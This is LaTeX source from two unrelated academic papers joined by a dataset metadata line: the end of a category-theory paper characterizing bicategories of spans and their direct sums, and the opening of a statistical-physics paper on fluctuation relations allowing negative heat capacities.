satisfying the Beck condition (meaning that for a pullback square
\begin{equation}\label{beckforpb}
\bfig
\square(0,0)[P`M`N`A;r`p`b`a]
\morphism(200,250)<100,0>[`;\simeq]
\efig
\end{equation}
the mate $pr^*{\,\s\to}\, a^*b$ of $ap\cong br$ in $\mathbf{B}$,
with respect to the adjunctions $r\dashv r^*$ and $a\dashv a^*$,
is invertible).
\eth
\prf
Given the cospan $a{\kern -.25em}:{\kern -.25em} N{\,\s\to}\, A\,{\s\toleft}\, M{\kern -.25em}:{\kern -.25em} b$ in $\mathrm{Map}\mathbf{B}$, let
$P$ together with $(r,\sigma,p)$ be a tabulation
for $a^*b{\kern -.25em}:{\kern -.25em} M{\,\s\to}\, N$. Then $pr^*{\,\s\to}\, a^*b$, the mate of
$\sigma{\kern -.25em}:{\kern -.25em} p{\,\s\to}\, a^*br$ with respect to $r\dashv r^*$, is invertible
by Theorem \ref{tabulation}. We have also $ap{\,\s\to}\, br$, the mate of
$\sigma{\kern -.25em}:{\kern -.25em} p{\,\s\to}\, a^*br$ with respect to $a\dashv a^*$. Since $A$
is discrete, $ap{\,\s\to}\, br$ is also invertible and is the only 2-cell
between the composite maps in question. If we have also
$u{\kern -.25em}:{\kern -.25em} N\,{\s\toleft}\, T{\,\s\to}\, M{\kern -.25em}:{\kern -.25em} v$, for maps $u$ and $v$ with $au\cong bv$, then the
mate $u{\,\s\to}\, a^*bv$ ensures that the span $u{\kern -.25em}:{\kern -.25em} N\,{\s\toleft}\, T{\,\s\to}\, M{\kern -.25em}:{\kern -.25em} v$ factors
through $P$ by an essentially unique map $w{\kern -.25em}:{\kern -.25em} T{\,\s\to}\, P$ with
$pw\cong u$ and $rw\cong v$.
\frp
\prp\label{tabonadic} In a cartesian bicategory with
Eilenberg-Moore objects for Comonads and for which Maps are Comonadic,
every span of maps $x{\kern -.25em}:{\kern -.25em} X\,{\s\toleft}\, S{\,\s\to}\, A{\kern -.25em}:{\kern -.25em} a$ gives rise to the following
tabulation diagram:
$$\bfig
\Ctriangle(0,0)|lmb|/<-`->`->/<500,250>[X`S`A;x`ax^*`a]
\morphism(300,160)|m|<0,180>[`;a\eta_x]
\efig$$
\eth
\prf A general tabulation counit $\omega_R{\kern -.25em}:{\kern -.25em} v_R{\,\s\to}\, Ru_R$ is given in terms
of the Eilenberg-Moore coalgebra for the comonad $(u,v)(u,v)^*$ and
necessarily $(u,v)(u,v)^*\cong G(R)$. It follows that for $R=ax^*$, it
suffices to show that $G(ax^*)\cong (x,a)(x,a)^*$.
Consider the diagram (with $\otimes$ suppressed):
$$\bfig
\Atriangle(0,0)|bba|/->`->`/[XSA`XXA`XAA;XxA`XaA`]
\Vtriangle(0,500)|mmm|/`->`->/[SA`XS`XSA;`(x,S)A`X(S,a)]
\Atriangle(0,1000)|lrm|/->`->`/[S`SA`XS;(S,a)`(x,S)`]
\Ctriangle(-500,0)|lml|/->``->/[SA`XA`XXA;xA``dA]
\Dtriangle(1000,0)|mrr|/`->`->/[XS`XA`XAA;`Xa`Xd]
\morphism(500,1500)|l|/{@{->}@/_3em/}/<-1000,-1000>[S`XA;(x,a)]
\morphism(500,1500)|r|/{@{->}@/^3em/}/<1000,-1000>[S`XA;(x,a)]
\efig$$
The comonoid $G(ax^*)$ can be read, from left to right, along the
`W' shape of the lower edge as $G(ax^*)\cong Xd^*.XaA.Xx^*A.dA$.
But each of the squares in the diagram is a (product-absolute) pullback
so that with Proposition \ref{mapbhaspb} at hand we can continue:
$$Xd^*.XaA.Xx^*A.dA\cong Xa.X(S,a)^*.(x,S)A.x^*A\cong%
Xa.(x,S).(S,a)^*. x^*A\cong (x,a)(x,a)^*$$
as required.
\frp
\section{Characterization of Bicategories of Spans}\label{charspan}
\subsection{}\label{Cfun}
If $\mathbf{B}$ is a cartesian bicategory with $\mathrm{Map}\mathbf{B}$ essentially locally
discrete then each slice $\mathrm{Map}\mathbf{B}/(X\otimes A)$
is also essentially locally discrete and we can write
$\mathrm{Span}\,\mathrm{Map}\mathbf{B}(X,A)$
for the categories obtained by taking the quotients of the equivalence
relations comprising the hom categories of the $\mathrm{Map}\mathbf{B}/(X\otimes A)$.
Then we can construct
functors $C_{X,A}{\kern -.25em}:{\kern -.25em}\mathrm{Span}\,\mathrm{Map}\mathbf{B}(X,A){\,\s\to}\,\mathbf{B}(X,A)$, where for
an arrow in $\mathrm{Span}\,\mathrm{Map}\mathbf{B}(X,A)$ as shown,
$$\bfig
\Ctriangle(0,0)|lml|/->`->`<-/[M`A`N;a`h`b]
\Dtriangle(500,0)|mrr|/->`->`<-/[M`X`N;h`x`y]
\efig$$
we define $C(y,N,b)=by^*$ and
$C(h){\kern -.25em}:{\kern -.25em} ax^*=(bh)(yh)^*\cong bhh^*y^*\to^{b\epsilon_hy^*} by^*$.
If $\mathrm{Map}\mathbf{B}$ is known to have pullbacks then the
$\mathrm{Span}\,\mathrm{Map}\mathbf{B}(X,A)$ become the hom-categories for a
bicategory $\mathrm{Span}\,\mathrm{Map}\mathbf{B}$ and we can consider whether the
$C_{X,A}$ provide the effects on homs for an identity-on-objects
pseudofunctor $C{\kern -.25em}:{\kern -.25em}\mathrm{Span}\,\mathrm{Map}\mathbf{B}{\,\s\to}\,\mathbf{B}$. Consider
\begin{equation}\label{beck}
\bfig
\Atriangle(0,0)/->`->`/[N`Y`A;y`b`]
\Vtriangle(500,0)/`->`->/[N`M`A;``]
\Atriangle(1000,0)/->`->`/[M`A`X;a`x`]
\Atriangle(500,500)/->`->`/[P`N`M;p`r`]
\efig
\end{equation}
where the square is a pullback. In somewhat
abbreviated notation, what is needed further are coherent,
invertible 2-cells $\widetilde C{\kern -.25em}:{\kern -.25em} CN.CM{\,\s\to}\, C(NM)=CP$,
for each composable pair of spans $M$, $N$, and
coherent, invertible 2-cells $C^\circ{\kern -.25em}:{\kern -.25em} 1_A{\,\s\to}\, C(1_A)$,
for each object $A$.
Since the identity span on $A$ is $(1_A,A,1_A)$,
and $C(1_A)=1_A.1^*_A\iso1_A.1_A\iso1_A$ we take
the inverse of this composite for $C^\circ$. To give the
$\widetilde C$ though is to give 2-cells
$yb^*ax^*{\,\s\to}\, ypr^*x^*$ and since spans of the form
$(1_N,N,b)$ and $(a,M,1_M)$ arise as special cases, it is
easy to verify that to give the $\widetilde C$ it is
necessary and sufficient to give coherent, invertible 2-cells
$b^*a{\,\s\to}\, pr^*$ for each pullback square in $\mathrm{Map}\mathbf{B}$. The inverse
of such a 2-cell $pr^*{\,\s\to}\, b^*a$ is the mate of a 2-cell
$bp{\,\s\to}\, aq$. But by discreteness a 2-cell
$bp{\,\s\to}\, aq$ must be essentially an identity. Thus, definability
of $\widetilde C$ is equivalent to the invertibility in $\mathbf{B}$
of the mate $pr^*{\,\s\to}\, b^*a$ of the identity $bp{\,\s\to}\, ar$, for each
pullback square as displayed in (\ref{beck}). In short,
if $\mathrm{Map}\mathbf{B}$ has pullbacks and these satisfy the Beck condition
as in Proposition \ref{mapbhaspb}
then we have a canonical pseudofunctor $C{\kern -.25em}:{\kern -.25em}\mathrm{Span}\,\mathrm{Map}\mathbf{B}{\,\s\to}\,\mathbf{B}$.
\thm\label{spanmain}
For a bicategory $\mathbf{B}$ the following are equivalent:
\begin{enumerate}[$i)$]
\item There is a biequivalence $\mathbf{B}\simeq\mathrm{Span}\,{\cal E}$,
for ${\cal E}$ a category with finite limits;
\item The bicategory $\mathbf{B}$ is cartesian, each comonad has an
Eilenberg-Moore object, and every map is comonadic.
\item The bicategory $\mathrm{Map}\mathbf{B}$ is an essentially locally
discrete bicategory with finite limits, satisfying in $\mathbf{B}$
the Beck condition for pullbacks of maps, and the
canonical $$C{\kern -.25em}:{\kern -.25em}\mathrm{Span}\,\mathrm{Map}\mathbf{B}{\,\s\to}\,\mathbf{B}$$ is a
biequivalence of bicategories.
\end{enumerate}
\eth
\prf
That $i)$ implies $ii)$ follows from our discussion in
the Introduction. That $iii)$ implies $i)$
is trivial so we show that $ii)$ implies $iii)$.
We have already observed in Theorem \ref{odibld} that,
for $\mathbf{B}$ cartesian with every object discrete,
$\mathrm{Map}\mathbf{B}$ is essentially locally discrete and we have seen
by Propositions \ref{mcifro} and \ref{mcisep} that,
in a cartesian bicategory in which Maps are Comonadic, every
object is discrete.
In Theorem~\ref{mapbhaspb} we have seen that, for $\mathbf{B}$ satisfying
the conditions of $ii)$, $\mathrm{Map}\mathbf{B}$ has pullbacks, and hence all
finite limits and, in $\mathbf{B}$ the Beck condition holds for pullbacks.
Therefore we have the canonical pseudofunctor $C{\kern -.25em}:{\kern -.25em}\mathrm{Span}\,\mathrm{Map}\mathbf{B}{\,\s\to}\,\mathbf{B}$
developed in \ref{Cfun}. To complete the proof it suffices to show that
the $C_{X,A}{\kern -.25em}:{\kern -.25em}\mathrm{Span}\,\mathrm{Map}\mathbf{B}(X,A){\,\s\to}\,\mathbf{B}(X,A)$ are equivalences of categories.
Define functors $F_{X,A}{\kern -.25em}:{\kern -.25em}\mathbf{B}(X,A){\,\s\to}\,\mathrm{Span}\,\mathrm{Map}\mathbf{B}(X,A)$
by $F(R)=F_{X,A}(R)=(u,\tau R,v)$ where
$$\bfig
\Ctriangle/<-`->`->/<500,250>[X`\tau R`A;u`R`v]
\morphism(200,250)|m|<200,0>[`;\omega]
\efig$$
is the $R$-component of the counit for
$\iota\dashv\tau{\kern -.25em}:{\kern -.25em}\mathbf{G}{\,\s\to}\,\mathrm{Map}\mathbf{B}$. For a 2-cell
$\alpha{\kern -.25em}:{\kern -.25em} R{\,\s\to}\, R'$ we define $F(\alpha)$ to be
the essentially unique map satisfying
$$\bfig
\morphism(-500,500)|m|[\tau R`\tau R';F(\alpha)]
\Ctriangle(0,0)|rrr|/<-`->`->/[X`\tau R'`A;u'`R'`v']
\morphism(175,400)|a|<150,0>[`;\omega']
\morphism(-500,500)|l|<1000,500>[\tau R`X;u]
\morphism(-500,500)|l|<1000,-500>[\tau R`A;v]
\place(750,500)[=]
\Ctriangle(1000,0)/<-``->/[X`\tau R`A;u``v]
\morphism(1500,1000)|l|/{@{->}@/_1em/}/<0,-1000>[X`A;R]
\morphism(1500,1000)|r|/{@{->}@/^1.5em/}/<0,-1000>[X`A;R']
\morphism(1150,400)|a|<150,0>[`;\omega]
\morphism(1450,400)|a|<150,0>[`;\alpha]
\efig$$
(We remark that essential uniqueness here means that
$F(\alpha)$ is determined to within unique invertible 2-cell.)
Since $\omega{\kern -.25em}:{\kern -.25em} v{\,\s\to}\, Ru$ has mate $vu^*{\,\s\to}\, R$ invertible,
because $(v,\tau R,u)$ is a tabulation of $R$,
it follows that we have a natural isomorphism
$CFR{\,\s\to}\, R$. On the other hand, starting with a span
$(x,S,a)$ from $X$ to $A$ we have as a consequence of
Theorem \ref{tabonadic} that $(x,S,a)$ is part of a
tabulation of $ax^*{\kern -.25em}:{\kern -.25em} X{\,\s\to}\, A$. It follows that we have a natural
isomorphism $(x,S,a){\,\s\to}\, FC(x,S,a)$, which completes the demonstration
that $C_{X,A}$ and $F_{X,A}$ are inverse equivalences.
\frp
\section{Direct sums in bicategories of spans}
In the previous section we gave a characterization of those (cartesian)
bicategories of the form $\mathrm{Span}\,{\cal E}$ for a category ${\cal E}$ with finite
limits. In this final section we give a refinement, showing that $\mathrm{Span}\,{\cal E}$
has direct sums if and only if the original category ${\cal E}$ is lextensive \cite{ext}.
Direct sums are of course understood in the bicategorical sense. A {\em zero object}
in a bicategory is an object which is both initial and terminal. In a bicategory with
finite products and finite coproducts in which the initial object is also terminal
there is a canonical induced arrow $X+Y\to X\times Y$, and we say that the
bicategory has {\em direct sums} when this map is an equivalence.
\begin{remark}
Just as in the case of ordinary categories, the existence of direct sums gives rise
to a calculus of matrices. A morphism $X_1+\ldots+X_m\to Y_1+\ldots+Y_n$
can be represented by an $m\times n$ matrix of morphisms between the summands,
and composition can be represented by matrix multiplication.
\end{remark}
\thm
Let ${\cal E}$ be a category with finite limits, and $\mathbf{B}=\mathrm{Span}\,{\cal E}$. Then the
following are equivalent:
\begin{enumerate}[$i)$]
\item $\mathbf{B}$ has direct sums;
\item $\mathbf{B}$ has finite coproducts;
\item $\mathbf{B}$ has finite products;
\item ${\cal E}$ is lextensive.
\end{enumerate}
\eth
\prf
$[i)\Longrightarrow$ $ii)]$ is trivial.
$[ii)\Longleftrightarrow$ $iii)]$ follows from the fact that $\mathbf{B}{^\mathrm{op}}$ is
biequivalent to $\mathbf{B}$.
$[ii)\Longrightarrow$ $iv)]$
Suppose that $\mathbf{B}$
has finite coproducts, and write $0$ for the initial object and $+$ for the coproducts.
For every object $X$ there is a unique span $0\,{\s\toleft}\, D{\,\s\to}\, X$. By uniqueness, any
map into $D$ must be invertible, and any two such with the same domain must
be equal. Thus when we compose the span with its opposite, as in
$0\,{\s\toleft}\, D{\,\s\to}\, X\,{\s\toleft}\, D{\,\s\to}\, 0$, the resulting span is just $0\,{\s\toleft}\, D{\,\s\to}\, 0$. Now by the
universal property of $0$ once again, this must just be $0\,{\s\toleft}\, 0{\,\s\to}\, 0$, and so
$D\cong 0$, and our unique span $0\to X$ is a map.
Clearly coproducts of maps are coproducts, and so the coproduct injections
$X+0\to X+Y$ and $0+Y\to X+Y$ are also maps. Thus the coproducts in $\mathbf{B}$
will restrict to ${\cal E}$ provided that the codiagonal $u{\kern -.25em}:{\kern -.25em} X+X\,{\s\toleft}\, E {\,\s\to}\, X{\kern -.25em}:{\kern -.25em} v$ is a map for
all objects $X$. Now the fact that the codiagonal composed with the first injection
$i:X\to X+X$ is the identity tells us that we have a diagram as on the left below
$$\xymatrix @!R=1pc @!C=1pc {
&& X \ar[dr]_{i'} \ar@{=}[dl] \ar@/^2pc/[ddrr]^{1} && &
&& X \ar[dr]_{i'} \ar@{=}[dl] \ar@/^2pc/[ddrr]^{i} \\
& X \ar[dr]^{i} \ar@{=}[dl] && E \ar[dl]_{u} \ar[dr]_{v} & &
& X \ar[dr]^{i} \ar@{=}[dl] && E \ar[dl]_{u} \ar[dr]_{u} \\
X && X+X && X & X && X+X && X+X }$$
in which the square is a pullback; but then the diagram on the right
shows that the composite of $u{\kern -.25em}:{\kern -.25em} X+X\,{\s\toleft}\, E{\,\s\to}\, X+X{\kern -.25em}:{\kern -.25em} u$ with the injection
$i:X\to X+X$ is just $i$. Similarly its composite with the other injection
$j:X\to X+X$ is $j$, and so $u{\kern -.25em}:{\kern -.25em} X+X\,{\s\toleft}\, E{\,\s\to}\, X+X{\kern -.25em}:{\kern -.25em} u$ is the identity.
This proves that the codiagonal is indeed a map, and so that ${\cal E}$ has finite
coproducts; we have already assumed that it has finite limits. To see that ${\cal E}$
is lextensive observe that we have equivalences
$${\cal E}/(X+Y)\simeq \mathbf{B}(X+Y,1) \simeq \mathbf{B}(X,1)\times\mathbf{B}(Y,1)\simeq {\cal E}/X\times {\cal E}/Y.$$
$[iv)\Longrightarrow$ $i)]$
Suppose that ${\cal E}$ is lextensive. Then in particular, it is distributive, so that
$(X+Y)\times Z\cong X\times Z+X\times Y$, and
we have
\begin{align*}
\mathbf{B}(X+Y,Z) &\simeq {\cal E}/\bigl((X+Y)\times Z\bigr) \simeq {\cal E}/(X\times Z+Y\times Z) \\
&\simeq {\cal E}/(X\times Z)\times {\cal E}/(Y\times Z) \simeq \mathbf{B}(X,Z)\times\mathbf{B}(Y,Z)
\end{align*}
which shows that $X+Y$ is the coproduct in $\mathbf{B}$; but a similar argument shows
that it is also the product.
\frp
\rmk
The implication $iv)\Rightarrow i)$ was proved in \cite[Section~3]{SP07}.
\eth
\rmk
The equivalence $ii)\Leftrightarrow iv)$ can be seen as a special case of a
more general result \cite{HS} characterizing colimits in ${\cal E}$ which are also (bicategorical) colimits in $\mathrm{Span}\,{\cal E}$.
\rmk
There is a corresponding result involving partial maps in lextensive categories,
although the situation there is more complicated as one does not have direct
sums but only a weakened relationship between products and coproducts, and
a similarly weakened calculus of matrices. See \cite[Section~2]{restiii}.
\eth
There is also a nullary version of the theorem. We simply recall that an initial object in a
category ${\cal E}$ is said to be {\em strict}, if any morphism into it is invertible, and
then leave the proof to the reader. Once again the equivalence $ii)\Leftrightarrow iv)$
is a special case of \cite{HS}.
\thm
Let ${\cal E}$ be a category with finite limits, and $\mathbf{B}=\mathrm{Span}\,{\cal E}$. Then the
following are equivalent:
\begin{enumerate}[$i)$]
\item $\mathbf{B}$ has a zero object;
\item $\mathbf{B}$ has an initial object;
\item $\mathbf{B}$ has a terminal object;
\item ${\cal E}$ has a strict initial object.
\end{enumerate}
\eth
\references
\bibitem[CKWW]{ckww} A. Carboni, G.M. Kelly, R.F.C. Walters, and R.J. Wood.
Cartesian bicategories II, {\em Theory Appl. Categ.\/} 19 (2008), 93--124.
\bibitem[CLW]{ext} A. Carboni, Stephen Lack, and R.F.C. Walters.
Introduction to extensive and distributive categories. {\em J. Pure Appl. Algebra\/}
84 (1993), 145--158.
\bibitem[C\&W]{caw}
A. Carboni and R.F.C. Walters. Cartesian bicategories. I. {\em J. Pure
Appl. Algebra\/} 49 (1987), 11--32.
\bibitem[C\&L]{restiii}
J.R.B. Cockett and Stephen Lack. Restriction categories III: colimits, partial limits, and
extensivity, {\em Math. Struct. in Comp. Science\/} 17 (2007), 775--817.
\bibitem[LSW]{lsw} I. Franco Lopez, R. Street, and R.J. Wood,
Duals Invert, {\em Applied Categorical Structures\/}, to appear.
\bibitem[H\&S]{HS}
T. Heindel and P. Soboci\'nski, Van Kampen colimits as bicolimits in Span,
{\em Lecture Notes in Computer Science,\/} (CALCO 2009), 5728 (2009), 335--349.
\bibitem[P\&S]{SP07}
Elango Panchadcharam and Ross Street, Mackey functors on compact closed categories, {\em J. Homotopy and Related Structures\/} 2 (2007), 261--293.
\bibitem[ST]{ftm}
R. Street. The formal theory of monads, {\em J. Pure Appl. Algebra\/} 2 (1972), 149--168.
\bibitem[W\&W]{ww} R.F.C. Walters and R.J. Wood.
Frobenius objects in cartesian bicategories, {\em Theory Appl. Categ.\/}
20 (2008), 25--47.
\endreferences
\end{document}
| 2024-02-18T23:40:05.705Z | 2010-02-12T07:37:46.000Z | algebraic_stack_train_0000 | 1,316 | 11,137 |
|
proofpile-arXiv_065-6554 | \section{Introduction}
According to the well-known fluctuation relation:
\begin{equation}\label{can.cfr}
C=k_{B}\beta^{2}\left\langle \delta U^{2}\right\rangle
\end{equation}
between the heat capacity $C$ and the energy fluctuations
$\left\langle \delta U^{2}\right\rangle $, the heat capacity should
be \textit{nonnegative}. However, such a conclusion is only an
illusion. Since the first theoretical demonstration about the
existence of macrostates with negative heat capacities $C<0$ by
Lyndel-Bell in the astrophysical context \cite{Lynden}, this anomaly
has been observed in several systems \cite{moretto,Dagostino,gro
na,Lyn2,pad,Lyn3,gro1}. The fluctuation relation (\ref{can.cfr})
directly follows from the consideration of the Gibbs' canonical
ensemble:
\begin{equation}
dp_{c}\left( U\left\vert \beta\right. \right) =\frac{1}{Z\left(
\beta\right) }\exp\left( -\beta U\right) \Omega\left( U\right)
dU,
\label{can}%
\end{equation}
which accounts for the equilibrium thermodynamic properties of a
system in thermal contact with a heat bath at constant temperature
$T$ when other thermodynamical variables like the system volume $V$
or a magnetic field $H$ are kept fixed, where $\beta=1/k_{B}T$. As
elsewhere shown \cite{gro1,Dauxois}, macrostates with $C<0$ can
exist within the microcanonical description of a given system, but
these states are \textit{thermodynamically unstable} under the
external influence imposed to the system within the Gibbs' canonical
ensemble.
A suitable extension of this standard result has been recently
derived \cite{vel-unc}:
\begin{equation}
C=k_{B}\beta^{2}\left\langle \delta U^{2}\right\rangle
+C\left\langle \delta\beta^{\omega
}\delta U\right\rangle , \label{unc}%
\end{equation}
which considers a \textit{system-surroundings} equilibrium situation
where the inverse temperature $\beta^{\omega }$ of a given
thermostat exhibits correlated fluctuations with the total energy
$U$ of the system under study as a consequence of the underlying
thermodynamic interaction. This last generalization differs from the
canonical equilibrium situation in the fact that the internal
thermodynamical state of the thermostat can be affected by the
presence of the system under study, constituting in this way a more
general framework than the usual canonical $\left(
\delta\beta^{\omega }=0\right) $ and microcanonical ensembles
$\left( \delta U=0\right) $.
The new fluctuation relation (\ref{unc}) defines a criterion capable
of detecting the presence of a regime with $C<0$ in the
microcanonical caloric curve $1/T\left( U\right) =\partial S\left(
U\right) /\partial U$ of the system through the correlated
fluctuations of the inverse temperature $\beta^{\omega}$ and the
energy $U$\ of the system itself. In fact, it asserts that
macrostates with $C<0$ are thermodynamically stable provided that
the influence of the thermostat obeyed the inequality $\left\langle
\delta \beta^{\omega}\delta U\right\rangle >1$. Consequently, any
attempt to impose the canonical conditions
$\delta\beta^{\omega}\rightarrow0$ leads to very large energy
fluctuations $\delta U\rightarrow\infty$ that induce the
thermodynamic instability of such anomalous macrostates.
As already discussed in a previous work \cite{vel.geo}, the
fluctuation-dissipation relation (\ref{unc}) has interesting
connections with different questions within statistical mechanics,
such as the extension of canonical Monte Carlo methods to allow the
study macrostates with negative heat capacities and to avoid the
super-critical slowing down of first-order phase transitions
\cite{mc3}, the justification of a complementary relation between
energy and temperature
\cite{bohr,Heisenberg,Rosenfeld,Mandelbrot,Gilmore,Lindhard,Lavenda,Scholg,Uffink},
the development of a geometric formulation for fluctuation theory
\cite{Weinhold,rupper}, as well as the Mandelbrot's derivation of
statistical mechanics from inference theory \cite{Mandelbrot}.
However, Eq.(\ref{unc}) is applicable to those equilibrium
situations where there is only involved the conjugated pair
energy-temperature. Thus, this result merely constitutes a first
step towards the development of an extension of \textit{equilibrium
fluctuation-dissipation relations} compatible with the existence of
anomalous response functions
\cite{Ison,Einarsson,Chomaz,Gulminelli,Lovett,Hugo}.
In this paper, we shall extend our previous results to an
equilibrium situation with several control parameters, that is, we
shall develop a special approach of fluctuation theory \cite{landau}
in order to arrive at a suitable generalization of the familiar
fluctuation relations:
\begin{equation}\label{familiar.fd}
C_{V}=\beta^{2}\left\langle \delta
Q^{2}\right\rangle,~VK_{T}=\beta\left\langle \delta
V^{2}\right\rangle,~\chi_{T}=\beta\left\langle \delta
M^{2}\right\rangle,
\end{equation}
compatible with the existence of macrostates with \textit{anomalous
values in response functions}, such as negative heat capacities
$C_{V}<0$, isothermal compressibilities $K_{T}<0$ or isothermal
magnetic susceptibilities $\chi_{T}<0$ in those magnetic systems
where this response function is expected to be nonnegative.
\section{The proposal}
\subsection{Notation conventions}
From the standard perspective of statistical mechanics, a
system-surroundings equilibrium situation with several control
parameters is customarily described by using the
\textit{Boltzmann-Gibbs distributions} \cite{landau}:
\begin{equation}
dp_{BG}\left( \left. U,X\right\vert \beta,Y\right)
=\frac{1}{Z\left(
\beta,Y\right) }\exp\left[ -\beta\left( U+YX\right) \right]\Omega\left(U,X\right)dUdX . \label{BGD}%
\end{equation}
The quantities $X=\left( V,M,P,N_{i},\ldots\right) $ represent
other macroscopic observables acting in a given application
(generalized displacements) such as the volume $V$, the
magnetization $M$ and polarization $P$, the number of chemical
species $N_{i} $, etc.; with $Y=\left(
p,-H,-E,-\mu_{i},\ldots\right) $ being the corresponding conjugated
thermodynamic parameters (generalized forces): the external pressure
$p$, magnetic $H$ and electric $E$ fields, the chemical potentials
$\mu_{i}$, etc. In the sake of simplicity, we shall consider the
Boltzmann's constant $k_{B}\equiv1$ along this work, so that,
$\beta$ in Eq.(\ref{BGD}) represents the inverse temperature,
$\beta=1/T$.
Conventionally, the system energy $U$ is the most important physical
observable in thermodynamics and statistical mechanics, and hence,
it is always distinguished from the other macroscopic observables
$X$. However, we shall not start from this distinction in the
present approach, a consideration that allows us to deal with a more
simple notation in our analysis. Let us consider the following
convention for the physical observables $\left( U,X\right)
\rightarrow I=\left( I^{1},I^{2},\ldots\right) $ and $\left( \beta
,Y\right) \rightarrow\beta=\left( \beta_{1},\beta_{2},\ldots\right)
$ for the thermodynamic parameters, in a way that the total
differential of entropy $S$ can be rewritten as follows:
$dS=\beta\left( dU+YdX\right) \rightarrow
dS=\beta_{1}dI^{1}+\beta_{2}dI^{2}+\ldots\equiv\beta_{i}dI^{i}$. We
will use hereafter the Einstein's summation convention, which allows
to rewrite the probabilistic weight of the Boltzmann-Gibbs
distribution (\ref{BGD}) as:
\begin{equation}
\omega_{BG}\left( \left. I\right\vert \beta\right)
=\frac{1}{Z\left(
\beta\right) }\exp\left( -\beta_{i}I^{i}\right) . \label{bg.w}%
\end{equation}
\subsection{Starting considerations on the distribution function}
At first glance, all that it is necessary to demand in order to
extend fluctuation relations (\ref{familiar.fd}) is to start from a
probabilistic distribution more general than the Boltzmann-Gibbs
distributions (\ref{BGD}). From a mathematical point of view, a
distribution that seems to describe the thermodynamical behavior of
a system under a general influence of an environment is the ansatz:
\begin{equation}
dp\left( I\right)=\omega\left( I\right) \Omega\left( I\right) dI,
\label{new}%
\end{equation}
whose generic probabilistic weight $\omega\left( I\right)$ admits
the Boltzmann-Gibbs form (\ref{bg.w}) as a particular case. We shall
shown in the next subsections that the hypothesis (\ref{new}),
although simple, is sufficiently general to achieve our purposes. In
fact, this expression is just a direct extension of the ansatz used
in our previous work \cite{vel-unc}:
\begin{equation}
dp\left( U\right)=\omega\left( U\right) \Omega\left( U\right) dU
\end{equation}
to a more general case with several macroscopic observables. Let us
now discuss under what general background conditions the
mathematical form (\ref{new}) can be supported by physical
arguments.
A particular and conventional situation is that where the system
under study and its environment can be considered as two \textit{
separable and independent finite subsystems} that constitute a
closed system in thermodynamic equilibrium. By admitting only
additive physical observables (e.g.: energy, volume, particles
number or electric charge) obeying the constraint $I_{T}=I+I_{A}$, a
simple ansatz for the distribution function is given by:
\begin{equation}
dp\left( \left. I\right\vert I_{T}\right)=\frac{1}{W\left( I_{T}\right) }%
\Omega _{e}\left( I_{T}-I\right) \Omega \left( I\right) dI,
\label{pp1}
\end{equation}%
where $\Omega \left( I\right) $ and $\Omega _{e}\left( I_{e}\right)
$ are the densities of states of the system and the environment,
respectively, and $W\left( I_{T}\right) $, the partition function
that ensures the normalization condition:
\begin{equation}
\int_{\Gamma }dp\left( \left. I\right\vert I_{T}\right)=1.
\label{norm}
\end{equation}
Here, $\Gamma$ represents all admissible values of the system
observables $I$.
Although Eq.(\ref{pp1}) provides a simple interpretation for
Eq.(\ref{new}), it clearly dismisses some important practical
situations where the \textit{additive constraint} $I_{T}=I+I_{e}$
cannot be ensured for all physical observables involved in the
system-environment thermodynamic interaction. Significant examples
of \textit{unconstrained observables} are the magnetization
$\mathbf{M}$ or the electric polarization $\mathbf{P}$ associated
with magnetic and electric systems respectively. A formal way to
overcome such a difficulty is carried out by representing the
density of state of the environment $\Omega _{e}$ in terms of the
observables of the system $I$ under study and the set of control
parameters $a$ of the given physical situation, $\Omega _{e}=\Omega
_{e}\left( \left. I\right\vert a\right) $. Such an explicit
dependence of the density of states of the environment on the
internal state of the system follows from their mutual interaction,
which leads to the existence of \textit{correlative effects} between
these systems. Thus, one can express the corresponding distribution
function as follows:
\begin{equation}
dp\left( \left. I\right\vert a\right)=\frac{1}{W\left( a\right)
}\Omega _{e}\left( \left. I\right\vert a\right) \Omega \left(
I\right) dI. \label{ansatz2}
\end{equation}%
The subset $\Gamma_{a}$ of all admissible values of the physical
observables $I$ now depend on the control parameters $a$.
Rigorously speaking, both \textit{separability} and
\textit{additivity} represent suitable idealizations of the real
physical conditions associated with the large thermodynamic systems
with a microscopic dynamics driven by short-range interactions.
These conditions cannot be naively extended to systems with
long-range interactions, which constitute a relevant framework for
the existence of macrostates with anomalous response functions. As
already mentioned in the introductory section, remarkable examples
are the astrophysical systems, whose thermodynamic description is
hallmarked by the existence of \textit{negative heat capacities}
$C<0$. Although one cannot trivially divide a long-range interacting
system into independent subsystems, an \textit{effective
separability} can be arisen as a direct consequence of the
underlying microscopic dynamics in some practical situations. For
example, it is physically admissible to speak about a separability
between a globular cluster and its nearby galaxy despite of the
long-range character of the gravitational interaction. Since
separability is, at least, an important condition to attribute a
reasonable physical meaning to the description of a system as an
individual entity, we shall demand this property as necessary
requirement for the applicability of the ansatz (\ref{new}).
The existence of long-range interactions also implies the incidence
of \textit{long-range correlations}. This last feature, by itself,
modifies in a significant way the thermodynamic behavior and the
macroscopic dynamics of a physical system. If one considers the
existing analogy with conventional systems at the \textit{critical
points} (where correlation length $\xi$ diverges,
$\xi\rightarrow\infty$), the dynamics of long-range interacting
systems should undergo the existence of some collective phenomena
with a very slow relaxation towards the final equilibrium
\cite{Dauxois}, as example, the so-called \textit{violent
relaxation} that appears during the \textit{collisionless dynamics}
of the astrophysical systems \cite{inChava}. Under this last
circumstance, it is usual that a long-range interacting system
cannot be found in a final thermodynamic equilibrium, but in a
long-living \textit{quasi-stationary state} \cite{Antoni,Latora}.
The above dynamical features establish certain analogies among the
long-range interacting systems with other physical systems with a
complex microscopic dynamics such as \textit{turbulent fluids}
\cite{beck1} and \textit{glassy systems} \cite{leticia}.
According to the above reasonings, one cannot expect that the
probabilistic weight $\omega(I)$ in Eq.(\ref{new}) can be always
interpreted in terms of the density of states of the environment
$\Omega_{e}$ as the cases associated with Eqs.(\ref{pp1}) or
(\ref{ansatz2}), since they demand the existence of a final
thermodynamic equilibrium and the non-incidence of long-range
interactions. Certainly, few systems in Nature are in absolute and
final equilibrium, since it presupposes that all radiative materials
would decayed completely and the nuclear reactions would have
transmuted all nuclei to the most stable of isotopes. Thus, the
hypothesis about the existence of a metastable equilibrium could be
sufficient for the applicability of thermodynamics in many practical
situations. Hereafter, we shall assume that \textit{the
probabilistic weight} $\omega(I)$ \textit{accounts for a general
thermodynamic influence of an environment}, which is found, at
least, in conditions of \textit{meta-stability}. This type of
\textit{ad hoc} hypothesis, that is, the using of
\textit{generalized statistical ensemble} with the form (\ref{new}),
is usual in the statistical mechanics literature in the last
decades. This kind of methodology has proved to be an useful
alternative to describe thermodynamic features of systems with a
